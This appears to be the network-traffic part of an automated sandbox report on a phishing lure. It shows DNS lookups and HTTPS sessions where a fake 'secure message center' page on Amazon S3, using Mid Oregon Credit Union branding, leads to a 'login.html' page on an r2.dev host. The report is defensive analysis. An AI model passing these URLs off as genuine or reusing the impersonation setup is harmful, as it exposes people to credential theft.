Jan 2, 2025 17:21:52.403410912 CET	1.1.1.1	192.168.2.4	0xeeb8	No error (0)	pub-dc3c20b29a7e4238b1149f20f12cabd6.r2.dev		172.66.0.235	A (IP address)	IN (0x0001)	false
Jan 2, 2025 17:21:53.475506067 CET	1.1.1.1	192.168.2.4	0x7421	No error (0)	img001.prntscr.com		104.23.140.12	A (IP address)	IN (0x0001)	false
Jan 2, 2025 17:21:53.475506067 CET	1.1.1.1	192.168.2.4	0x7421	No error (0)	img001.prntscr.com		104.23.139.12	A (IP address)	IN (0x0001)	false
Jan 2, 2025 17:21:53.498254061 CET	1.1.1.1	192.168.2.4	0x6de8	No error (0)	img001.prntscr.com			65	IN (0x0001)	false
Jan 2, 2025 17:21:53.773082018 CET	1.1.1.1	192.168.2.4	0x4a5f	No error (0)	www.midoregon.com		67.227.180.41	A (IP address)	IN (0x0001)	false
Jan 2, 2025 17:21:54.022937059 CET	1.1.1.1	192.168.2.4	0x7286	No error (0)	logo.clearbit.com	d26p066pn2w0s0.cloudfront.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 2, 2025 17:21:54.022937059 CET	1.1.1.1	192.168.2.4	0x7286	No error (0)	d26p066pn2w0s0.cloudfront.net		13.32.27.129	A (IP address)	IN (0x0001)	false
Jan 2, 2025 17:21:54.022937059 CET	1.1.1.1	192.168.2.4	0x7286	No error (0)	d26p066pn2w0s0.cloudfront.net		13.32.27.44	A (IP address)	IN (0x0001)	false
Jan 2, 2025 17:21:54.022937059 CET	1.1.1.1	192.168.2.4	0x7286	No error (0)	d26p066pn2w0s0.cloudfront.net		13.32.27.77	A (IP address)	IN (0x0001)	false
Jan 2, 2025 17:21:54.022937059 CET	1.1.1.1	192.168.2.4	0x7286	No error (0)	d26p066pn2w0s0.cloudfront.net		13.32.27.14	A (IP address)	IN (0x0001)	false
Jan 2, 2025 17:21:54.023272038 CET	1.1.1.1	192.168.2.4	0x651d	No error (0)	logo.clearbit.com	d26p066pn2w0s0.cloudfront.net		CNAME (Canonical name)	IN (0x0001)	false

HTTP Request Dependency Graph

midoregoncu-securemessagecenter.s3.us-east-1.amazonaws.com

https:

assets.orb.alkamitech.com

www.midoregon.com

pub-dc3c20b29a7e4238b1149f20f12cabd6.r2.dev

img001.prntscr.com

logo.clearbit.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49741	54.231.130.18	443	5808	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 16:21:36 UTC	724	OUT	GET /open/message_12832.html HTTP/1.1 Host: midoregoncu-securemessagecenter.s3.us-east-1.amazonaws.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-02 16:21:36 UTC	414	IN	HTTP/1.1 200 OK x-amz-id-2: 7O3j6z4SaKFzAxvJViRF/0SrebLKdxY0UrhFsCzhN8JEvc5k30r3xwYhP2F0yjyN3+gFbtZyYEA= x-amz-request-id: 87FY0DMGYDS8NFXX Date: Thu, 02 Jan 2025 16:21:37 GMT Last-Modified: Thu, 26 Dec 2024 13:14:56 GMT ETag: "8da634b23e5f8a6a075492eee0c02274" x-amz-server-side-encryption: AES256 Accept-Ranges: bytes Content-Type: text/html Content-Length: 3620 Server: AmazonS3 Connection: close
2025-01-02 16:21:36 UTC	3620	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 0d 0a 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 69 64 6f 72 65 67 6f 6e 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0d 0a 3c 74 69 74 6c 65 3e 4d 69 64 20 4f 72 65 67 6f 6e 20 43 72 65 64 69 74 20 55 6e 69 6f 6e 3c 2f 74 69 74 6c 65 3e 0d 0a Data Ascii: <html><head><meta charset="UTF-8"><meta name="viewport"content="width=device-width, initial-scale=1.0, user-scalable=no"><link rel="icon" href="https://www.midoregon.com/favicon.ico" type="image/x-icon"><title>Mid Oregon Credit Union</title>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49742	143.204.215.95	443	5808	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 16:21:37 UTC	747	OUT	GET /production/themesets/28f75336-2d61-4c64-8237-e68ae6ac9157/themes/theme-builder/default/assets/images/brand-logo-wide.png HTTP/1.1 Host: assets.orb.alkamitech.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://midoregoncu-securemessagecenter.s3.us-east-1.amazonaws.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-02 16:21:38 UTC	757	IN	HTTP/1.1 200 OK Content-Type: image/png Content-Length: 17791 Connection: close Date: Thu, 02 Jan 2025 16:21:39 GMT x-amz-replication-status: COMPLETED Last-Modified: Wed, 26 Jun 2024 14:47:10 GMT ETag: "568d45d85624d00fa8b18805aded3f12" x-amz-server-side-encryption: AES256 Cache-Control: max-age=3600 Content-Disposition: form-data; name="images/brand-logo-wide.png"; filename="images/brand-logo-wide.png"; filename*=utf-8''images%2Fbrand-logo-wide.png x-amz-version-id: DIT.WLyBkYl.Mw5.LI0AuLaZAJWV3tRm Accept-Ranges: bytes Server: AmazonS3 X-Cache: Miss from cloudfront Via: 1.1 f8895de4463e8d120a0f4b4a1f7703e4.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA53-C1 X-Amz-Cf-Id: dGuZEPFw3NJowR-W9DybrE0t6N9LMpQwMBkTvBDbSMRNIiTUXbqhWg==
2025-01-02 16:21:38 UTC	8287	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 00 86 08 06 00 00 00 67 8d b7 49 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 20 00 49 44 41 54 78 5e ed 5d 09 9c 14 d5 d1 af 7a 3d b3 17 20 20 02 62 44 4d f7 ec 2e 87 37 26 f1 8a c1 88 c2 ce aa f1 66 01 51 a3 89 89 1a 8d 46 fd 3e a3 c8 f6 7a 25 46 73 99 c3 2b f1 40 65 67 35 fa 99 63 77 21 5e c4 33 1e 18 15 11 d8 9d ee 20 2a 08 28 c8 b9 d7 f4 ab ef 57 b3 b3 eb cc ec f4 31 b3 37 f4 cb 2f bf c5 e9 77 d4 ab ee fe f7 7b f5 aa fe 85 e0 17 5f 03 be 06 fa 44 03 e7 dd f6 ec a8 d6 b6 58 98 c8 3a 12 01 bf 10 81 fc fb 16 ce 3b e1 c3 3e 19 7c 17 19 04 77 91 79 f8 d3 f0 35 30 a0 35 50 a1 d7 9f 0a 40 f7 13 d1 98 0e 41 11 71 ad 40 71 ee 50 da eb f5 fb f4 23 76 0e e8 09 0c 10 e1 7c c0 1a 20 37 c2 17 63 d7 Data Ascii: PNGIHDR,gIsRGB IDATx^]z= bDM.7&fQF>z%Fs+@eg5cw!^3 *(W17/w{_DX:;>\|wy505P@Aq@qP#v\| 7c
2025-01-02 16:21:38 UTC	9504	IN	Data Raw: 4f d6 e8 e1 8c f7 70 66 65 dd 49 00 c4 27 86 ae 6e 0c 5e e5 40 c4 9b 23 7a 98 4f c0 33 16 0e ad 59 41 3b db dc fa 43 05 0f 8f cc 0f 73 f8 9a 63 f1 12 32 25 10 7f 5b ad 87 3b 19 7c 07 dd 0a 4b d3 34 a6 e2 b5 4d 2d 0e 00 17 9a a6 99 92 8c 40 d3 b4 79 44 e4 72 b2 93 59 b7 42 88 1b a2 d1 68 0a 0f 93 ae eb 62 c1 82 05 7c e3 32 b3 3a b6 6f c9 4e b0 f3 30 4f 02 8b 9c dc 1a 3c ce a7 d6 34 4d 57 86 82 ee 02 96 57 e7 51 45 28 df f6 c2 33 64 f7 84 7b 35 76 67 fa ba f7 28 60 79 62 0b c0 37 11 c0 71 75 cd 94 9b 6e 2f 34 12 bc 12 a9 0a db 72 80 cd d5 17 8f 89 81 75 01 01 5c ec 16 cf e9 34 16 b3 6e 22 8a 8b dd 3c e4 b9 8f 99 95 75 5f 00 90 63 76 73 af 54 d5 9e bc dd 11 aa 22 7a 79 a7 b9 66 30 02 56 8b 53 38 0a 22 9e 6e 18 c6 d3 c9 37 a8 b8 b8 f8 1b 96 65 79 f2 62 4e bf Data Ascii: OpfeI'n^@#zO3YA;Csc2%[;\|K4M-@yDrYBhb\|2:oN0O<4MWWQE(3d{5vg(`yb7qun/4ru\4n"<u_cvsT"zyf0VS8"n7eybN

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49743	143.204.215.112	443	5808	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 16:21:39 UTC	469	OUT	GET /production/themesets/28f75336-2d61-4c64-8237-e68ae6ac9157/themes/theme-builder/default/assets/images/brand-logo-wide.png HTTP/1.1 Host: assets.orb.alkamitech.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-02 16:21:39 UTC	764	IN	HTTP/1.1 200 OK Content-Type: image/png Content-Length: 17791 Connection: close Date: Thu, 02 Jan 2025 16:21:39 GMT x-amz-replication-status: COMPLETED Last-Modified: Wed, 26 Jun 2024 14:47:10 GMT ETag: "568d45d85624d00fa8b18805aded3f12" x-amz-server-side-encryption: AES256 Cache-Control: max-age=3600 Content-Disposition: form-data; name="images/brand-logo-wide.png"; filename="images/brand-logo-wide.png"; filename*=utf-8''images%2Fbrand-logo-wide.png x-amz-version-id: DIT.WLyBkYl.Mw5.LI0AuLaZAJWV3tRm Accept-Ranges: bytes Server: AmazonS3 X-Cache: Hit from cloudfront Via: 1.1 86ef89199388021c33b079c598103b12.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA53-C1 X-Amz-Cf-Id: rwkAy4uGDFxywOj4LLwrMb1R5Hxi2Fl1VxPpmfDONLr99A0a2ypDdg== Age: 1
2025-01-02 16:21:39 UTC	15620	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 00 86 08 06 00 00 00 67 8d b7 49 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 20 00 49 44 41 54 78 5e ed 5d 09 9c 14 d5 d1 af 7a 3d b3 17 20 20 02 62 44 4d f7 ec 2e 87 37 26 f1 8a c1 88 c2 ce aa f1 66 01 51 a3 89 89 1a 8d 46 fd 3e a3 c8 f6 7a 25 46 73 99 c3 2b f1 40 65 67 35 fa 99 63 77 21 5e c4 33 1e 18 15 11 d8 9d ee 20 2a 08 28 c8 b9 d7 f4 ab ef 57 b3 b3 eb cc ec f4 31 b3 37 f4 cb 2f bf c5 e9 77 d4 ab ee fe f7 7b f5 aa fe 85 e0 17 5f 03 be 06 fa 44 03 e7 dd f6 ec a8 d6 b6 58 98 c8 3a 12 01 bf 10 81 fc fb 16 ce 3b e1 c3 3e 19 7c 17 19 04 77 91 79 f8 d3 f0 35 30 a0 35 50 a1 d7 9f 0a 40 f7 13 d1 98 0e 41 11 71 ad 40 71 ee 50 da eb f5 fb f4 23 76 0e e8 09 0c 10 e1 7c c0 1a 20 37 c2 17 63 d7 Data Ascii: PNGIHDR,gIsRGB IDATx^]z= bDM.7&fQF>z%Fs+@eg5cw!^3 *(W17/w{_DX:;>\|wy505P@Aq@qP#v\| 7c
2025-01-02 16:21:39 UTC	370	IN	Data Raw: e2 82 82 82 53 93 83 bd 55 55 65 3d 5e 98 ac 93 fc fc fc 03 92 4f 78 13 3a 76 b5 61 69 9a 56 4b 44 6c 24 4f 2e 29 40 ca 17 34 4d bb 31 7d 55 0a 00 7f 34 4d b3 d3 bd 86 b7 96 44 d4 98 76 4f 9f 1f 3f 7e 7c f9 92 25 4b 78 9b dd 71 ef d9 26 97 72 a0 81 88 c5 86 61 44 ed 9e 59 1f b0 bc bc cd 03 ac 8e aa aa 6c 58 af 4a 17 ab b0 b0 70 5c 26 07 49 2f e2 6b 9a b6 2c f9 c4 8c 1d 0c 0d c3 c8 b8 15 d3 34 ed 06 22 4a 39 75 43 c4 5b 0d c3 98 97 3c 96 aa aa ec b0 da e9 1e c1 d7 10 f1 9e 8e 53 b7 84 e3 26 fb 41 15 a4 3d dc c7 1a 86 91 02 74 bd 01 58 03 75 85 c5 86 6f 29 e5 f2 34 9d fc de 30 8c cb d3 f4 cb a7 c4 57 75 17 b0 78 c5 fc f6 db 6f 6f 4e f6 f8 e7 3e 15 45 49 59 39 f1 6f 36 ab ca f7 4c d3 ec 34 ea 27 6c 92 29 a0 83 88 f7 1b 86 91 12 43 a9 aa 2a 7f 80 f8 43 d4 59 Data Ascii: SUUe=^Ox:vaiVKDl$O.)@4M1}U4MDvO?~\|%Kxq&raDYlXJp\&I/k,4"J9uC[<S&A=tXuo)40WuxooN>EIY9o6L4'l)C*CY
2025-01-02 16:21:39 UTC	1801	IN	Data Raw: cc cb cb db 2b 9d 86 66 c2 84 09 25 ad ad ad 29 21 3d bc 85 37 0c 83 ef 75 bc d8 ac b0 ba 00 96 a6 69 b7 12 d1 f5 3e 60 0d 32 00 ca 56 5c 4d d3 ce 27 a2 87 d2 db 09 21 a6 44 a3 d1 b7 b3 ed 8f eb 67 09 58 7f 4f 73 77 c8 66 c8 d7 4d d3 8c 1b 76 55 55 e5 2d 48 dc 4e 95 04 94 29 0f 7f c7 ef aa aa fe 2f 00 fc 3c b9 6e 77 b7 84 bd 04 58 9d f3 cb a4 14 1b 4f f7 94 ad 97 d7 15 96 a6 69 77 10 d1 35 dd 05 2c 55 55 f9 c0 e3 a5 74 79 47 8e 1c 99 97 6e c0 9f 38 71 e2 b8 96 96 96 2e 66 82 91 23 47 b2 b1 3f 4e 57 e3 75 85 e5 03 56 36 af cd 20 ae 6b f7 80 e5 ea d6 90 f8 2a 66 b3 25 7c 96 88 98 5a 25 eb 82 88 1f 18 86 11 8f 7d 54 55 75 16 00 a4 50 9c d8 ad ec 06 d1 96 d0 0d b0 5c 4f 09 b3 00 2c af 2b 2c 36 ce 77 fa b7 a5 d3 ed 84 42 a1 93 a4 94 6c 4b 4c 2e 64 18 86 92 ee Data Ascii: +f%)!=7ui>`2V\M'!DgXOswfMvUU-HN)/<nwXOiw5,UUtyGn8q.f#G?NWuV6 k*f%\|Z%}TUuP\O,+,6wBlKL.d

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49744	67.227.180.41	443	5808	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 16:21:39 UTC	630	OUT	GET /favicon.ico HTTP/1.1 Host: www.midoregon.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://midoregoncu-securemessagecenter.s3.us-east-1.amazonaws.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-02 16:21:39 UTC	492	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 16:21:39 GMT Server: Apache Last-Modified: Thu, 24 Sep 2020 17:23:28 GMT Accept-Ranges: bytes Content-Length: 15086 Cache-Control: max-age=2592000, public Expires: Sat, 01 Feb 2025 16:21:39 GMT Vary: Accept-Encoding,User-Agent Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-FRAME-OPTIONS: SAMEORIGIN Connection: close Content-Type: image/x-icon
2025-01-02 16:21:39 UTC	7700	IN	Data Raw: 00 00 01 00 03 00 30 30 00 00 01 00 20 00 a8 25 00 00 36 00 00 00 20 20 00 00 01 00 20 00 a8 10 00 00 de 25 00 00 10 10 00 00 01 00 20 00 68 04 00 00 86 36 00 00 28 00 00 00 30 00 00 00 60 00 00 00 01 00 20 00 00 00 00 00 00 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b5 81 62 09 b5 81 62 46 b5 81 62 a0 b5 81 62 e0 b5 81 62 fd b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 fe b5 81 62 e5 b5 Data Ascii: 00 %6 % h6(0` $bbFbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
2025-01-02 16:21:39 UTC	7386	IN	Data Raw: 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 80 5c ff b5 81 62 ff b5 81 62 df b5 81 62 81 b5 81 62 fe b5 80 5c ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 Data Ascii: WWWWWWWWWWWWWWWW\bbbb\WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49746	67.227.180.41	443	5808	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 16:21:40 UTC	352	OUT	GET /favicon.ico HTTP/1.1 Host: www.midoregon.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-02 16:21:40 UTC	492	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 16:21:40 GMT Server: Apache Last-Modified: Thu, 24 Sep 2020 17:23:28 GMT Accept-Ranges: bytes Content-Length: 15086 Cache-Control: max-age=2592000, public Expires: Sat, 01 Feb 2025 16:21:40 GMT Vary: Accept-Encoding,User-Agent Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-FRAME-OPTIONS: SAMEORIGIN Connection: close Content-Type: image/x-icon
2025-01-02 16:21:40 UTC	7700	IN	Data Raw: 00 00 01 00 03 00 30 30 00 00 01 00 20 00 a8 25 00 00 36 00 00 00 20 20 00 00 01 00 20 00 a8 10 00 00 de 25 00 00 10 10 00 00 01 00 20 00 68 04 00 00 86 36 00 00 28 00 00 00 30 00 00 00 60 00 00 00 01 00 20 00 00 00 00 00 00 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b5 81 62 09 b5 81 62 46 b5 81 62 a0 b5 81 62 e0 b5 81 62 fd b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 fe b5 81 62 e5 b5 Data Ascii: 00 %6 % h6(0` $bbFbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
2025-01-02 16:21:40 UTC	7386	IN	Data Raw: 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 80 5c ff b5 81 62 ff b5 81 62 df b5 81 62 81 b5 81 62 fe b5 80 5c ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 Data Ascii: WWWWWWWWWWWWWWWW\bbbb\WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49754	172.66.0.235	443	5808	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 16:21:51 UTC	794	OUT	GET /midoregon.com/login.html HTTP/1.1 Host: pub-dc3c20b29a7e4238b1149f20f12cabd6.r2.dev Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://midoregoncu-securemessagecenter.s3.us-east-1.amazonaws.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-02 16:21:52 UTC	283	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 16:21:52 GMT Content-Type: text/html Content-Length: 10523 Connection: close Accept-Ranges: bytes ETag: "8c245c908e9c653018919538a4b628a8" Last-Modified: Thu, 26 Dec 2024 11:42:43 GMT Server: cloudflare CF-RAY: 8fbc15a59bcc4273-EWR
2025-01-02 16:21:52 UTC	1369	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 69 64 6f 72 65 67 6f 6e 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0d 0a 20 20 Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no"> <link rel="icon" href="https://www.midoregon.com/favicon.ico" type="image/x-icon">
2025-01-02 16:21:52 UTC	1369	IN	Data Raw: 6f 72 3a 72 67 62 28 35 31 2c 20 31 30 32 2c 20 31 35 33 29 3b 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 20 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6c 69 67 68 74 65 72 3b 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 31 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 63 61 70 69 74 61 6c 69 7a 65 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 32 34 70 78 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 68 69 64 64 65 6e 20 7b 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 20 7d 0d 0a 20 20 20 20 20 Data Ascii: or:rgb(51, 102, 153); color: white; font-size: 16px; cursor: pointer; border: none;font-weight: lighter; font-style: normal;letter-spacing: 1px;text-align: center;text-transform: capitalize;border-radius: 24px; } .hidden { display: none; }
